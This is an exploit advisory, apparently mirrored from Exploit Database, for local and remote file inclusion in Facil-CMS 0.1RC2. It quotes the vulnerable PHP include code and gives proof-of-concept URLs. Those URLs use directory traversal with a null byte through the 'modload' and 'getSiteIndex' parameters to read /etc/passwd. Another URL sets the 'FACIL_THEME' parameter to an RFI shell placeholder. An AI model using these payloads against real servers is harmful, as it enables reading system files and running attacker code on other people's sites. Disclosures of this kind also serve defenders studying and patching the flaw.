Facil-CMS 0.1RC2 – Local/Remote File Inclusion

• Exploit Database
• 107 阅读

• 作者： eidelweiss
  日期： 2010-04-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12061/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82

  ######################################################## Facil-CMS (LFI/RFI) Vulnerability ######################################################## [+]Title : Facil-CMS Multiple Vulnerability [+]Version: 0.1RC2 [+]Download: http://sourceforge.net/projects/facil-cms/files/ [+]Author: eidelweiss [+]Contact: eidelweiss[at]cyberservices[dot]com   [!]Thank`s To: all friends   ########################################################   -=[ Vuln C0de ]=- *********************** [-]facil-cms/index.php   require_once('config.inc.php'); require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php'); $config = new facilConfig(); $utils = new facilUtils(); if($utils->is_module($config->getSiteIndex()))   require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php'); require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');   *********************** [-]facil-cms/modules.php   require_once('config.inc.php'); require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');   if($_POST['modload'] && !eregi("/", $_POST['modload'])) { $_MODLOAD = trim($_POST['modload']); if($_POST['fileload'] && !eregi("/", $_POST['fileload'])) { $FILELOAD = trim($_POST['fileload']);   $_MODLOAD = false; $FILELOAD = false;   if($_POST['admload'] &&!eregi("/", $_POST['admload'])) { $_ADMLOAD = trim($_POST['admload']); if($_POST['fileload'] && !eregi("/", $_POST['fileload']))     $_ADMLOAD = false; $FILELOAD = false;   require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php'); require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');   *******************   [-]facil-cms/includes/facil-settings.php   if(!isset($_SESSION['FACIL_LANGUAGE'])) { $_SESSION['FACIL_LANGUAGE'] = $config->getLanguage(); } require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php'); require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');   *******************   -=[ Proof Of Concept ]=-   http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00 Similar reference: http://www.exploit-db.com/exploits/5792   http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00   http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]   ########################################################